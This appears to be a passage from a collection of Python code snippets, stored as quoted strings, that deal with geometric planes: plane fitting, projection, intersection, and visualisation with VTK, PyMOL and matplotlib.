ant_copy = ant.Copy()\n ant_copy.Translate([30, 0, -10])\n\n # Create plotting object\n plobj = vtkInterface.PlotClass()\n plobj.AddMesh(ant, 'r')\n plobj.AddMesh(ant_copy, 'b')\n\n # Add airplane mesh and make the color equal to the Y position\n plane_scalars = airplane.points[:, 1]\n plobj.AddMesh(airplane, scalars=plane_scalars, stitle='Plane Y\\nLocation')\n plobj.AddText('Ants and Plane Example')\n plobj.Plot()", "def mirror_point_to_plane(point, plane):\n assert isinstance(plane, cg3d_plane.CGPlane)\n pn, norm = plane.get_point_and_normal()\n norm.normalize()\n return point - 2.0 * ((point - pn) * norm) * norm", "def project_points_plane(points, plane):\n return [project_point_plane(point, plane) for point in points]", "def _getDockColor(self, plane):\n color = (0,0,0)\n if plane.zAxis != -1:\n color = self.globalAxis[plane.zAxis].color[0:3]\n return color", "def __getPlaneName(self):\n item = self._item()\n planeNormal = item.getNormal() if item is not None else None\n\n for name, normal in self._PLANES.items():\n if numpy.array_equal(planeNormal, normal):\n return name\n return '-'", "def get_data_on_horizontal_plane(self, varname, record, plane_number):\n if self.get_mesh_dimension() != 3:\n raise TelemacException(\"Action possible only on 3d mesh\")\n\n values = self.get_data_value(varname, record)\n if plane_number < 0 or plane_number >= self.nplan:\n raise TelemacException(\\\n 'Wrong plane number {} should be in [0, {}]'\\\n .format(plane_number, self.nplan-1))\n start = plane_number*self.npoin2\n end = (plane_number+1)*self.npoin2\n extracted_values = values[start:end]\n\n return extracted_values", "def create_plane(self):\n\n # First we calculate our point increment for both the x and y values\n inc_x = (self.xmax - self.xmin)/(self.xlen - 1)\n inc_y = (self.ymax - self.ymin)/(self.ylen - 1)\n\n # This for-loop will add every x-value with every y-value, saving the values column wise\n # i.e. (-10,-10), (-10,-9), (-10.-8),...,(-10,n) for n = our y-values.\n # store these combinations into a list, and add that to our plane. \n # The nested loop will then traverse again and will get the combinations for the next x-value.\n # The loop will continue until all x-values and y-value combinations are added to our plane.\n for y in range(0, self.ylen + 1):\n temp_list = []\n for x in range(0, self.xlen + 1):\n temp_list.append(self.f((self.xmin + x*inc_x) + (self.ymin + y*inc_y)*1j))\n self.plane.append(temp_list)", "def test_CoordinatePlane(self):\n origin = np.random.randn(3)\n normal = np.random.randn(3)\n up_vector = np.random.randn(3)\n plane = shapes_nd.Plane(origin, normal)\n cplane = shapes_3d.CoordinatePlane(origin, normal, up_vector)\n \n np.testing.assert_almost_equal(cplane.dim, plane.dim)\n np.testing.assert_almost_equal(cplane.origin, plane.origin)\n np.testing.assert_almost_equal(cplane.normal, plane.normal)\n \n p3 = [0, 1, 0]\n c, d = cplane.project_point(p3, ret_dist=True)\n np.testing.assert_almost_equal(p3, cplane.revert_projection(c, d))\n p3 = np.random.randn(5, 3)\n c, d = cplane.project_point(p3, ret_dist=True)\n np.testing.assert_almost_equal(p3, cplane.revert_projection(c, d))", "def planeIndex(plane, center = False):\n return (planeBase(center = center) * np.array(plane)).sum()", "def __init__(self,functions):\n Plane.__init__(self)\n self.functions=functions\n self.colors=([RED,BLUE,GREEN,YELLOW]+[window.randomColor() for i in range(len(functions)-4)])[:len(functions)]", "def compare_plane_data(pd1, pd2):\n raise NotImplementedError", "def include_cut_poly_array(self, planes, fix_pts):\n planeActors = []\n\n for i in range(3):\n # get plane coefficients\n a = planes[i][0]\n b = planes[i][1]\n c = planes[i][2]\n\n # create vtk plane object\n VTKplane = vtk.vtkPlane()\n VTKplane.SetNormal(a, b, c)\n if fix_pts[0] == 'var': # for variability test\n VTKplane.SetOrigin(self.epi_apex_node)\n else: # for foreshortening test\n VTKplane.SetOrigin(fix_pts[1+i])\n\n # create cutter\n cutEdges = vtk.vtkCutter()\n cutEdges.SetInputData(self.endo_poly) # always cut through endo\n cutEdges.SetCutFunction(VTKplane)\n cutEdges.GenerateCutScalarsOn()\n cutEdges.GenerateTrianglesOn()\n cutEdges.SetValue(0, 0.5)\n\n # create strips # just for output purposes\n cutStrips = vtk.vtkStripper()\n cutStrips.SetInputConnection(cutEdges.GetOutputPort())\n cutStrips.Update()\n\n # get polydata from strips (just for output purposes)\n cutPoly = vtk.vtkPolyData()\n cutPts = cutStrips.GetOutput().GetPoints()\n cutPoly.SetPoints(cutPts)\n cutPoly.SetPolys(cutStrips.GetOutput().GetLines())\n\n cutterMapper = vtk.vtkPolyDataMapper()\n cutterMapper.SetInputConnection(cutEdges.GetOutputPort())\n cutterMapper.ScalarVisibilityOff()\n\n # create plane actor\n planeActor = vtk.vtkActor()\n planeActor.SetMapper(cutterMapper)\n planeActor.GetProperty().SetColor(self.plane_colors[i])\n planeActor.GetProperty().SetLineWidth(6)\n\n # store the actors of the specific planes to add later into 1 renderer\n planeActors.append(planeActor)\n\n return planeActors", "def plane_fit(points):\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1],\n points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:, np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:, -1]", "def __init__(self, graphics, plane):\n # screen / plane\n self.graphics = graphics\n\n self.view = [graphics.screen_width, graphics.screen_height]\n self.plane = list(plane)\n self.recalculate()\n # camera\n self.anchor = None\n self.pan = False # smooth scroll\n self.find_time = 0.5 # seconds\n self.pan_speed = 50.0 # pos/sec\n self.last_time = time.time()", "def WritePlane(self):\n if not self.__train:\n print('ERROR: Must use Train before WritePlane')\n sys.exit(-1)\n if not self.__openPlaneO:\n print('ERROR: Must use OpenPlaneO before WritePlane')\n sys.exit(-1)\n\n # Defines angular dimensions\n self.__nc_RSoft_O.createDimension('type', self.__n_type)\n\n # Defines variables\n if self.__containsRadial:\n rad_plane_id = self.__nc_RSoft_O.createVariable(\\\n 'radial_plane', 'f4', \\\n ('type','radial_structure_functions'))\n rad_plane_id[:] = self.radial_plane\n if self.__containsAngular:\n ang_plane_id = self.__nc_RSoft_O.createVariable(\\\n 'angular_plane', 'f4', \\\n ('type','angular_structure_functions'))\n ang_plane_id[:] = self.angular_plane\n intercept_id_O = self.__nc_RSoft_O.createVariable(\\\n 'intercept', 'f4', ('type'))\n intercept_id_O[:] = self.intercept", "def project_onto_plane(vect):\n x, y, z = vect\n \n return (x, y, 0.)", "def intersect_plane(L, plane):\n \n # Line U, V\n # Plane N n\n # (VxN-nU:U.N)\n # Note that this is in homogeneous coordinates.\n # intersection of plane (n,p) with the line (v,p)\n # returns point and line parameter\n \n \n den = np.dot(L.w, plane.n)\n \n if abs(den) > (100*_eps):\n P = -(np.cross(L.v, plane.n) + plane.p * L.w) / den\n p = (np.cross(L.v, plane.n) - plane.p * L.w) / den\n \n P = L.pp\n t = np.dot( P-p, N)\n return namedtuple('intersect_plane', 'p t')(P, t)\n else:\n return None", "def addPlaneToScene(self, foot, x, y):\r\n #research\r\n profprint()\r\n scene = slicer.mrmlScene\r\n # Create model node\r\n model = slicer.vtkMRMLModelNode()\r\n model.SetScene(scene)\r\n model.SetName(scene.GenerateUniqueName(\".ObturatorPlane\"))\r\n\r\n planeSource = vtk.vtkPlaneSource()\r\n foot-=25*(x+y)\r\n #planeSource.SetOrigin(np.array(foot))\r\n planeSource.SetOrigin(list(foot))\r\n planeSource.SetPoint1(np.array(foot)+50*x)\r\n planeSource.SetPoint2(np.array(foot)+50*y)\r\n planeSource.Update()\r\n model.SetAndObservePolyData(planeSource.GetOutput())\r\n\r\n # Create display node\r\n modelDisplay = slicer.vtkMRMLModelDisplayNode()\r\n modelDisplay.SetColor(1,1,0) # yellow\r\n modelDisplay.SetBackfaceCulling(0)\r\n modelDisplay.SetScene(scene)\r\n scene.AddNode(modelDisplay)\r\n model.SetAndObserveDisplayNodeID(modelDisplay.GetID())\r\n\r\n # Add to scene\r\n scene.AddNode(model)\r\n # transform = slicer.vtkMRMLLinearTransformNode()\r\n # scene.AddNode(transform)\r\n # model.SetAndObserveTransformNodeID(transform.GetID())\r\n #\r\n # vTransform = vtk.vtkTransform()\r\n # vTransform.Scale(50,50,50)\r\n # #vTransform.RotateX(30)\r\n # transform.SetAndObserveMatrixTransformToParent(vTransform.GetMatrix())\r", "def get_cut_poly_array(self, planes, angles, disp, fix_pts):\n noPlanes = len(planes)\n plane_storer = [] #4, 2, 3ch in this order\n cut_poly_array = [] #4, 2, 3ch in this order\n\n view_type = ['4ch', '2ch', '3ch']\n\n for i in range(noPlanes):\n if fix_pts[0] == 'var': # for variability test\n origin = self.epi_apex_node\n else: # for foreshortening test\n origin = fix_pts[1+i]\n\n cutPoly_endo_epi, planeActor_endo_epi = self.get_edges_strips(planes[i], origin,\n view_type[i], self.plane_colors[i])\n cut_poly_array.append(cutPoly_endo_epi) # 4, 2, 3\n plane_storer.append(planeActor_endo_epi)\n\n\n # DISPLAY PURPOSES #\n\n # include apex_node\n apexA = include_points(list(self.epi_apex_node), 1, 15, (0, 0, 0))\n\n ## create legend box ##\n legend = vtk.vtkLegendBoxActor()\n legend.SetNumberOfEntries(3)\n\n legendBox = vtk.vtkCubeSource()\n legendBox.SetXLength(2)\n legendBox.SetYLength(2)\n legend.SetEntry(0, legendBox.GetOutput(), \"4 ch\", (0, 1, 0)) #green\n legend.SetEntry(1, legendBox.GetOutput(), \"2 ch\", (0, 0, 1)) #blue\n\n legend.UseBackgroundOn()\n legend.LockBorderOn()\n legend.SetBackgroundColor(0.5, 0.5, 0.5)\n\n # create text box to display the angles ..\n textActor = vtk.vtkTextActor()\n textActor.SetInput(\"4ch = \" + str(angles[0])\n + \"\\n\" + \"2ch = \" + str(angles[1]))\n textActor.SetPosition2(10, 40)\n textActor.GetTextProperty().SetFontSize(24)\n textActor.GetTextProperty().SetColor(1.0, 0.0, 0.0)\n\n # display x-y-z actor\n axes = get_axes_actor([80,80,80], [0,0,0])\n\n # lets display the rv_dir\n rv_dir_act = include_points(list(60*self.rv_dir), 1, 15, (1, 0 ,1))\n\n ren = vtk.vtkRenderer()\n ren.SetBackground(1.0, 1.0, 1.0)\n ren.AddActor(self.meshActor)\n\n # for plAct in [item for sublist in plane_storer for item in sublist]: # flatten list\n # ren.AddActor(plAct)\n\n ren.AddActor(plane_storer[0][0]) # 4ch endo\n ren.AddActor(plane_storer[0][1]) # 4ch epi\n ren.AddActor(plane_storer[1][0]) # 2ch endo\n ren.AddActor(plane_storer[1][1]) # 2ch epi\n # ren.AddActor(plane_storer[2][0]) # 3ch endo\n # ren.AddActor(plane_storer[2][1]) # 3ch epi\n\n self.meshActor.GetProperty().SetOpacity(1.0)\n ren.AddActor(legend)\n ren.AddActor2D(textActor)\n ren.AddActor(axes)\n ren.AddActor(apexA)\n ren.AddActor(rv_dir_act)\n\n if disp:\n vtk_show(ren)\n\n return cut_poly_array, plane_storer, ren", "def plane(*args, length: float=0.0, name: AnyStr=\"\", position: List[float, float, float]=None,\n rotation: List[float, float, float]=None, size: float=0.0, width: float=0.0,\n **kwargs)->AnyStr:\n pass", "def plane_fit(points):\n import numpy as np\n from numpy.linalg import svd\n\n points = np.reshape(\n points, (np.shape(points)[0], -1)\n ) # Collapse trialing dimensions\n assert (\n points.shape[0] <= points.shape[1]\n ), \"There are only {} points in {} dimensions.\".format(\n points.shape[1], points.shape[0]\n )\n ctr = points.mean(axis=1)\n x = points - ctr[:, np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:, -1]", "def isInPlane(self, p) -> bool:\n # Testing for zero is done with math.isclose, to avoid rounding/floating point errors.\n # Since we are testing near zero, abs_tol is set to 1e-09\n return math.isclose(\n math.fabs(\n dot(\n self.normal(),\n Vector.connect(p.x, p.y, p.z, self.p0.x, self.p0.y, self.p0.z),\n )\n ),\n 0,\n rel_tol=1e-09,\n abs_tol=1e-09,\n )", "def plane_scale(self, scale):\n cmd = '{}testPlaneScale {}'.format(self.console, scale)\n self.write_command(cmd)", "def get_transformable_plane(self, x_range = None, y_range = None):\n plane_config = dict(self.plane_config)\n shift_val = ORIGIN\n if x_range is not None:\n x_min, x_max = x_range\n plane_config[\"x_radius\"] = x_max - x_min\n shift_val += (x_max+x_min)*RIGHT/2.\n if y_range is not None:\n y_min, y_max = y_range\n plane_config[\"y_radius\"] = y_max - y_min\n shift_val += (y_max+y_min)*UP/2.\n plane = ComplexPlane(**plane_config)\n plane.shift(shift_val)\n if self.use_multicolored_plane:\n self.paint_plane(plane)\n return plane", "def planeFit(points):\n\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1], points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n\n return ctr, np.linalg.svd(M)[0][:,-1]", "def plane_update(self):\n self.plane.update()", "def bbPlane(selection='(all)', color='gray', transp=0.3, state=-1, name=None, quiet=1):\n from pymol.cgo import BEGIN, TRIANGLES, COLOR, VERTEX, END\n from pymol import cgo\n from chempy import cpv\n\n # format input\n transp = float(transp)\n state, quiet = int(state), int(quiet)\n if name is None:\n name = cmd.get_unused_name(\"backbonePlane\")\n\n if state < 0:\n state = cmd.get_state()\n elif state == 0:\n for state in range(1, cmd.count_states(selection) + 1):\n bbPlane(selection, color, transp, state, name, quiet)\n return\n\n AAs = []\n coords = dict()\n\n # need hydrogens on peptide nitrogen\n cmd.h_add('(%s) and n. N' % selection)\n\n # get the list of residue ids\n for obj in cmd.get_object_list(selection):\n sel = obj + \" and (\" + selection + \")\"\n for a in cmd.get_model(sel + \" and n. CA\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n AAs.append(key)\n coords[key] = [a.coord, None, None]\n for a in cmd.get_model(sel + \" and n. O\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n if key in coords:\n coords[key][1] = a.coord\n for a in cmd.get_model(sel + \" and ((n. N extend 1 and e. H) or (r. PRO and n. CD))\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n if key in coords:\n coords[key][2] = a.coord\n\n # need at least two amino acids\n if len(AAs) <= 1:\n print(\"ERROR: Please provide at least two amino acids, the alpha-carbon on the 2nd is needed.\")\n return\n\n # prepare the cgo\n obj = [\n BEGIN, TRIANGLES,\n ]\n\n for res in range(0, len(AAs) - 1):\n curIdx, nextIdx = str(AAs[res]), str(AAs[res + 1])\n\n # populate the position array\n pos = [coords[curIdx][0], coords[curIdx][1], coords[nextIdx][2], coords[nextIdx][0]]\n\n # if the data are incomplete for any residues, ignore\n if None in pos:\n if not quiet:\n print(' bbPlane: peptide bond %s -> %s incomplete' % (curIdx, nextIdx))\n continue\n\n if cpv.distance(pos[0], pos[3]) > 4.0:\n if not quiet:\n print(' bbPlane: %s and %s not adjacent' % (curIdx, nextIdx))\n continue\n\n normal = cpv.normalize(cpv.cross_product(\n cpv.sub(pos[1], pos[0]),\n cpv.sub(pos[2], pos[0])))\n\n obj.append(cgo.NORMAL)\n obj.extend(normal)\n\n # need to order vertices to generate correct triangles for plane\n if cpv.dot_product(cpv.sub(pos[0], pos[1]), cpv.sub(pos[2], pos[3])) < 0:\n vorder = [0, 1, 2, 2, 3, 0]\n else:\n vorder = [0, 1, 2, 3, 2, 1]\n\n # fill in the vertex data for the triangles;\n for i in vorder:\n obj.append(VERTEX)\n obj.extend(pos[i])\n\n # finish the CGO\n obj.append(END)\n\n # update the UI\n cmd.load_cgo(obj, name, state, zoom=0)\n cmd.set(\"cgo_transparency\", transp, name)\n cmd.color(color, name)", "def xyplane(draw, r, x, shift = np.array([1000, 1000, 0, 0]), scale = 300):\n extent = 2.8\n pln = np.array(\n [\n [x,-extent,0],\n [x,extent,0],\n [x,extent,extent*2],\n [x,-extent,extent*2]\n ]\n )\n pln = np.dot(pln,np.transpose(r))\n pln = pln * scale + shift[:3]\n draw.polygon([(pln[0][0],pln[0][1]),(pln[1][0],pln[1][1]),(pln[2][0],pln[2][1]),(pln[3][0],pln[3][1])], (0,102,255,70))", "def project_plane_to_2d(xyz_arr, img, center, dist_thresh):\n\tplane_img = np.zeros(img.size)\n\tplane_img[xyz_arr[:, 2] > dist_thresh + center[2]] = 1\n\n\tplane_img = np.uint8(np.reshape(plane_img, (424, 512)) * 255) # reshape to match depth data and convert to uint8\n\tplane_img = np.uint8(\n\t\t(np.ones((424, 512)) * 255) - plane_img) # invert img so pixel value corresponds to NOT ground plane\n\tret, plane_img = cv2.threshold(plane_img, 0, 255,\n\t\t\t\t\t\t\t\t cv2.THRESH_BINARY) # filter points that are probaly not ground plane\n\tplane_img = cv2.subtract(img, plane_img)\n\treturn plane_img", "def plot_sag_plane(self, P0=None, sag_pl=None):\n if P0 is None: P0 = np.array([0,0,0])\n if sag_pl is None: sag_pl = self.sp\n norm, d = sag_pl[:3], sag_pl[3]\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n plt.ion()\n # create x,y\n xypts = 10\n xrng = 300\n yrng = 130\n xrng_mesh = np.linspace(P0[0], P0[0]-xrng, xypts)\n yrng_mesh = np.linspace(P0[1]-yrng/2., P0[1]+yrng, xypts)\n xx, yy = np.meshgrid(xrng_mesh, yrng_mesh)\n # calculate corresponding z\n zz = -1 * (norm[0] * xx + norm[1] * yy + d) / norm[2]\n # plot the surface\n self.fig = plt.figure()\n self.fig_ax = self.fig.add_subplot(111, projection='3d')\n self.fig_ax.plot_wireframe(xx, yy, zz, color='gray')\n #ax.quiver(P0[0], P0[1], norm[0], norm[1])\n self.fig_ax.set_xlabel('X')\n self.fig_ax.set_ylabel('Y')\n self.fig_ax.set_zlabel('Z')\n self.fig_ax.set_zlim(P0[2]-xrng, P0[2]+yrng)\n plt.show()", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def planeFit(points):\n import numpy as np\n from numpy.linalg import svd\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1], points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:,-1]", "def PCA_vis(select_PCA_features, player_attributes):\n x = player_attributes.loc[:, select_PCA_features].values\n\n # Standardizing the features\n x = StandardScaler().fit_transform(x)\n\n # perform 3 component PCA\n pca = PCA(n_components=3)\n principalComponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(\n data=principalComponents,\n columns=[\n \"principal component 1\",\n \"principal component 2\",\n \"principal component 3\",\n ],\n )\n\n # plot players dataset projection on three principal components\n # %matplotlib notebook\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1, projection=\"3d\")\n ax.set_title(\"3 component PCA\", fontsize=30)\n\n # plot first k players' info along principal components\n k = 4000\n ax.scatter(\n principalDf.loc[:k, \"principal component 1\"],\n principalDf.loc[:k, \"principal component 2\"],\n principalDf.loc[:k, \"principal component 3\"],\n s=1,\n )\n\n ax.set_xlabel(\"Principal Component 1\", fontsize=15)\n ax.set_ylabel(\"Principal Component 2\", fontsize=15)\n ax.set_zlabel(\"Principal Component 3\", fontsize=15)\n plt.show()\n\n return principalDf", "def vplane(self, fig=None):\n #TODO more general multi-axis layout...\n figsize = (9, 6.5) # good for letter paper\n if fig is None: fig = plt.figure(figsize=figsize)\n else: fig.set_size_inches(*figsize)\n axkw = dict(frameon = True)\n left, width = 0.075, 0.6\n bh = 0.11\n pad = 0.04\n depth_ax = fig.add_axes((left, 6*pad+4.5*bh, width, bh*2), **axkw)\n axkw.update(dict(sharex = depth_ax))\n pitch_ax = fig.add_axes((left, 5*pad+3.5*bh, width, bh), **axkw)\n buoyancy_ax = fig.add_axes((left, 4*pad+2.5*bh, width, bh), **axkw)\n mass_ax = fig.add_axes((left, 3*pad + 1.5*bh, width, bh), **axkw)\n control_surface_ax = fig.add_axes((left, 2*pad + bh/2, width, bh), **axkw)\n control_mode_ax = fig.add_axes((left, pad, width, bh/2), **axkw)\n # TODO adjust scale and coverage for each axes\n # TODO do this again now that middle labels are removed\n\n self.plot_timeseries('depth', '-', axes=depth_ax)\n self.plot_timeseries('platform_pitch_angle', axes=pitch_ax)\n self.plot_timeseries('platform_mass_position', axes=mass_ax)\n self.plot_timeseries('platform_buoyancy_position', axes=buoyancy_ax)\n self.plot_timeseries('platform_elevator_angle', axes=control_surface_ax)\n # TODO Include another panel with VerticalControl mode (iff present)\n\n # TODO only if engineering data is requested...\n ### add to depth axes ###\n depth_science = {\n 'Depth_Keller/depth': 'c-',\n 'CTD_NeilBrown/depth': 'k-',\n 'Depth_MSI_US300/depth': 'm-'}\n for k, v in depth_science.items():\n try: self.plot_timeseries(k, v, axes=depth_ax)\n except: print('no {0}'.format(k))\n\n depth_engineering = {\n 'VerticalControl/smoothDepthInternal': 'r-',\n 'VerticalControl/depthCmd': 'g-',\n 'VerticalControl/depthErrorInternal': 'g:'}\n for k, v in depth_engineering.items():\n try: self.plot_timeseries(k, v, axes=depth_ax)\n except: print('no {0}'.format(k))\n # TODO only if sw debug flag is set \n depth_rate_engineering = {\n 'VerticalControl/depthRateCmd': 'gray',\n 'VerticalControl/depth_rate': 'gray', # XXX why same color?\n }\n for k, v in depth_rate_engineering.items():\n try: \n self.plot_timeseries(k, vi, axes=depth_ax, \n convert=oalib.make_multiplier(100))\n except: print('no {0}'.format(k))\n ### add to pitch axes ###\n pitch_engineering = {\n 'AHRS_sp3003D/platform_pitch_angle': 'k-', \n 'DVL_micro/platform_pitch_angle': 'm-',\n 'AHRS_3DMGX3/platform_pitch_angle': 'c-',\n 'InternalSim/platform_pitch_angle': ':r',\n }\n for k, v in pitch_engineering.items():\n try: self.plot_timeseries(k, v, axes=pitch_ax)\n except: print('no {0}'.format(k))\n ### add to mass axes ###\n mass_engineering = {\n 'VerticalControl/massPositionAction': 'g-', \n 'VerticalControl/massIntegralInternal': 'c-',\n 'MassServo/platform_mass_position': 'r-',\n #'VerticalControl/massPitchErrorInternal': ':r',\n }\n for k, v in mass_engineering.items():\n try: self.plot_timeseries(k, v, axes=mass_ax)\n except: print('no {0}'.format(k))\n ### add to buoyancy axes ###\n buoyancy_engineering = {\n 'VerticalControl/buoyancyAction': 'm-',\n 'BuoyancyServo/platform_buoyancy_position': 'b-',\n }\n for k, v in buoyancy_engineering.items():\n try: \n self.plot_timeseries(k, v,\n# convert=oalib.make_multiplier(-10), \n axes=buoyancy_ax)\n except: print('no {0}'.format(k))\n ### add to control surface axes ###\n control_surface_engineering = {\n 'VerticalControl/elevatorAngleAction': 'm-', \n 'VerticalControl/elevatorIntegralInternal': 'm:',\n 'ElevatorServo/platform_elevator_angle': 'c-',\n }\n for k, v in control_surface_engineering.items():\n try: \n self.plot_timeseries(k, v, convert = np.rad2deg, \n axes=control_surface_ax)\n except: print('no {0}'.format(k))\n \n\n # TODO only if supporting data is requested\n ### add other supporting data ###\n try: self.plot_timeseries('CTD_NeilBrown/depth', 'k-', axes=depth_ax)\n except: print('no CTD_NeilBrown/depth')\n try: self.plot_timeseries('Depth_MSI_US300', 'm-', axes=depth_ax)\n except: print('no Depth_MSI_US300')\n\n\n ### print additional information ###\n buoyancyNeutral = ('Config/Control/buoyancyNeutral',\n 'Config/Servo/buoyancyNeutral')\n for s in buoyancyNeutral:\n try:\n print('{0} = {1} {2}'.format(s, self[s+'/value'], self[s+'/units']))\n except:\n print('{0} not found'.format(s))\n \n# VertMd(0=N/A,1=Surf,2=Dep,3=DepRt,4=Pit0,5=Pit,6=PitRt,7=M&E,8=Flt),\n# VertHoldMd(0=N/A,1=Ms,2=El,3=Both)\n try:\n v, t = self.timeseries('VerticalControl/verticalMode')\n oalib.plot_date_blocks(t, v, axes=control_mode_ax, colormap=mpl.cm.jet)\n except: print('VerticalControl/verticalMode not found')\n\n depth_ax.invert_yaxis()\n for ax in fig.get_axes():\n ax.grid(True)\n try:\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5),\n fontsize='small')\n except:\n print('uncaught exception for legend...')\n for ax in fig.get_axes()[:-1]:\n plt.setp(ax.get_xticklabels(), visible=False)\n\n depth_ax.set_title(os.path.basename(self.filename))\n control_mode_ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M'))\n plt.setp(control_mode_ax.get_xticklabels(), rotation=30,\n fontsize='small')", "def test_create(self):\n f = azplugins.restrain.plane(group=hoomd.group.all(), point=(0,0,0), normal=(1,0,0), k=2.0)\n\n f.set_params(k=5.0)\n f.set_params(k=8)\n\n f.set_params(point=(0,0,1))\n f.set_params(point=[0,0,1])\n f.set_params(point=np.array([0,0,1]))\n\n f.set_params(normal=(0,0,1))\n f.set_params(normal=[0,0,1])\n f.set_params(normal=np.array([0,0,1]))\n\n f.set_params(point=(0,0,0), normal=(1,0,0), k=10.0)", "def add_plane(self, plane):\n self.__plane_list.append(plane)", "def get_plane(\n self,\n pos=None,\n norm=None,\n plane=None,\n sx=None,\n sy=None,\n color=\"lightgray\",\n alpha=0.25,\n **kwargs,\n ):\n axes_pairs = dict(sagittal=(0, 1), horizontal=(2, 0), frontal=(2, 1))\n\n if pos is None:\n pos = self.root._mesh.centerOfMass()\n\n try:\n norm = norm or self.space.plane_normals[plane]\n except KeyError: # pragma: no cover\n raise ValueError( # pragma: no cover\n f\"Could not find normals for plane {plane}. Atlas space provides these normals: {self.space.plane_normals}\" # pragma: no cover\n )\n\n # Get plane width and height\n idx_pair = (\n axes_pairs[plane]\n if plane is not None\n else axes_pairs[\"horizontal\"]\n )\n\n bounds = self.root.bounds()\n root_bounds = [\n [bounds[0], bounds[1]],\n [bounds[2], bounds[3]],\n [bounds[4], bounds[5]],\n ]\n\n wh = [float(np.diff(root_bounds[i])) for i in idx_pair]\n if sx is None:\n sx = wh[0]\n if sy is None:\n sy = wh[1]\n\n # return plane\n return Actor(\n Plane(pos=pos, normal=norm, sx=sx, sy=sy, c=color, alpha=alpha),\n name=f\"Plane at {pos} norm: {norm}\",\n br_class=\"plane\",\n )", "def __init__(self, planes, cosmology):\r\n self.planes = planes\r\n self.plane_redshifts = [plane.redshift for plane in planes]\r\n self.cosmology = cosmology", "def plane_list(self, new_list):\n self.__plane_list = new_list", "def __init__(self,\n r = 1.0,\n normal = Vector(0.0,1.0,0.0),\n origin = Vector(0.0,0.0,0.0),\n orientation = Vector(1.0,0.0,0.0),\n c1 = Color(0.01,0.01,0.01),\n c2 = Color(0.99,0.99,0.99)):\n \n CheckPlane.__init__(self, normal, origin, orientation, c1, c2)\n self.origin = origin\n self.set_orientation(orientation)\n self.r = r\n self.R = r ** 2.0", "def plane_shape(self) -> typing.Tuple[int, int]:\n return self._channel_arrays[0].shape[self.y_pos], self._channel_arrays[0].shape[self.x_pos]", "def from_plane_and_radius(cls, plane, radius):\n return cls(radius, frame=Frame.from_plane(plane))", "def planeFit(self, points):\n pointsP = points\n points = np.array(points).transpose()\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n ctr = points.mean(axis=1)\n if points.shape[0] > points.shape[1]:\n return list(ctr), self.verticalAxis()\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:,-1]", "def __copy__(self) -> 'Plane':\n return self.__class__(self._normal, self._distance_from_origin)", "def PlaneSubtraction(data, direction='xy', xdim=20, ydim=20):\n img = 1*data\n dy, dx = img.shape\n x = np.linspace(0, xdim, dx)\n y = np.linspace(0, ydim, dy)\n DX, DY = np.meshgrid(x, y)\n PX = []\n PY = []\n\n for i, j in zip(np.arange(dy), np.arange(dx)):\n lx = img[i]\n ly = img[:, j]\n maskx = np.isnan(lx)\n masky = np.isnan(ly)\n\n if len(lx[maskx]) < len(lx):\n s = np.polyfit(x[~maskx], lx[~maskx], 1)\n PX.append(s)\n\n if len(ly[masky]) < len(ly):\n s = np.polyfit(y[~masky], ly[~masky], 1)\n PY.append(s)\n\n px = np.nanmean(PX, axis=0)\n py = np.nanmean(PY, axis=0)\n print(\"x - slope: %.2e, y - slope: %.2e\" % (px[0], py[0]))\n print(\"calculate planes\")\n xplane = np.polyval(px, DX)\n yplane = np.polyval(py, DY)\n\n if direction == 'x':\n print('x plane subtraction')\n correction = xplane\n elif direction == 'y':\n print('y plane subtraction')\n correction = yplane\n else:\n print('x-y plane subtraction')\n correction = xplane + yplane\n\n corrected = data - correction\n corrected -= np.nanmin(corrected)\n return corrected", "def test_select_roi():\n _c = io.create_sample_Dataset(n_frames=5, rows=10, cols=10)\n _c = _c.sel(x=slice(35, 70), y=slice(30, 90))\n assert _c.u.shape == (7, 2, 5) # note the last dimension is preserved", "def figures_2d_of_planes(\r\n self,\r\n plane_index: Optional[int] = None,\r\n subtracted_image: bool = False,\r\n model_image: bool = False,\r\n plane_image: bool = False,\r\n use_source_vmax: bool = False,\r\n zoom_to_brightest: bool = True,\r\n interpolate_to_uniform: bool = False,\r\n ):\r\n\r\n visuals_2d = self.get_visuals_2d()\r\n\r\n visuals_2d_no_critical_caustic = self.get_visuals_2d()\r\n 